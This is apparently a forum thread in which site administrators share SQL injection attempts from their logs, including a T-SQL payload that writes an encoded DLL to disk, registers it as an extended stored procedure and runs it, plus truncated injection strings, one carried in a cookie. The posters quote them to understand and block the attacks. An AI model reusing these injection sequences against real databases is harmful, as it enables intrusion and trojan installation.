JohnH (guest) - 01/08/2007 7:16 PM
I've been getting these from an Asian IP block for the last couple days - they haven't managed to find a hole yet, but it looks like they're serious... Here's the payload they're trying to inject:

declare @s varbinary(2048)
set @s=0x... -- (hex-encoded DLL body omitted)
declare @o int
exec sp_oacreate 'adodb.stream',@o output
exec sp_oasetproperty @o,'type',2
exec sp_oamethod @o,'open'
exec sp_oamethod @o,'writetext',null,@s
declare @r int
exec sp_oacreate 'adodb.stream',@r output
exec sp_oasetproperty @r,'type',1
exec sp_oamethod @r,'open'
exec sp_oasetproperty @o,'position',2
exec sp_oamethod @o,'copyto',null,@r
exec sp_oamethod @r,'savetofile',null,'sqlhotfix.dll',2
use master
drop procedure sp_hotfix
dbcc addextendedproc ('sp_hotfix','sqlhotfix.dll')
exec sp_hotfix--

Looks like they're encoding a .dll as a binary, writing it to a file, installing it as an extended stored procedure and executing it. I don't know what the .dll does, but chances are it's nothing good ;)
Buck Woody (guest) - 01/17/2007 4:39 PM
You're right. The payload is a trojan that they are naming with a funny "sqlhotfix" name, which of course is bogus. Have you set up something to block them, or will you give them a honeypot to catch them?
Curious (guest) - 06/09/2007 2:14 PM
Any chance you could post the IP block?
I have a similar problem (guest) - 11/07/2007 11:26 AM
;DECLARE @S NVARCHAR(4000);SET @S=CAST(

Also from an Asian IP 202.108.28.168
sunnya (guest) - 11/27/2008 9:50 PM
POST /shop/NewDesign/ModelTemplate.asp HTTP/1.1
Cookie: ModelID=15845;CategoryId=2479%3BDECLARE%20@S%20VARCHAR(4000)%3BSET%20@S%3DCAST(0x4445434C415

Can anyone help me, what is actually going on?
Chip Andrews (Posts: 114) - 12/09/2008 5:04 PM
In your case the injected code is being placed in a cookie. They are hoping that when your application processes the cookie, it will be passed to the database and executed.